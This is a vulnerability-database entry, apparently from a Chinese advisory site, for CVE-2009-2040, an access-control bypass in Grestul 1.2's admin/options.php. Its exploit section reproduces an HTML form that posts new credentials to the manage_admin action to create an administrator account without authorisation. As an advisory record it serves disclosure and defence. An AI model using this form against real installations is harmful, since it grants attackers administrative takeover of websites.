Grestul "admin/options.php" 授权问题漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117917 漏洞类型 授权问题
发布时间 2009-06-08 更新时间 2009-06-08
CVE编号 CVE-2009-2040 CNNVD-ID CNNVD-200906-243
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8902
https://www.securityfocus.com/bid/44424
https://cxsecurity.com/issue/WLB-2009060139
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-243
|漏洞详情
Grestul1.2版本的admin/options.php没有适当地限制访问权,远程攻击者可以借助提交的一个直接的请求中的一个manage_admin操作,绕过权限并创建管理账户。
|漏洞EXP
Grestul 1.2 Remote add admin exploit
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://grestul.com/
Note: Algerie 3-1 Egypt

code
-----
<form method="post" name="add_admin" id="add_admin" action="http://grestul.com/demo/admin/options.php?action=manage_admin">
  <label for="username_new" class="label_newpage">Username:</label><br /><input type="text" name="username_new" id="username_new" class="input_newpage" value="" />
  <br /><br /><label for="password" class="label_newpage">New Password:</label><br /><input type="password" name="password" id="password" class="input_newpage" value="" />
  <br /><br /><label for="con_password" class="label_newpage">Confirm Password:</label><br /><input type="password" name="con_password" id="con_password" class="input_newpage" value="" />
  <br /><input type="submit" name="add_admin" id="add_admin" value="Add Admin" class="submit_newpage" />
  </form></div>
---------------------------------------------------------------------------------------------------------

# milw0rm.com [2009-06-08]
|受影响的产品
Grestul Group Grestul 1.2
|参考资料

来源:XF
名称:grestul-options-security-bypass(50999)
链接:http://xforce.iss.net/xforce/xfdb/50999
来源:MILW0RM
名称:8902
链接:http://www.milw0rm.com/exploits/8902
来源:SECUNIA
名称:35367
链接:http://secunia.com/advisories/35367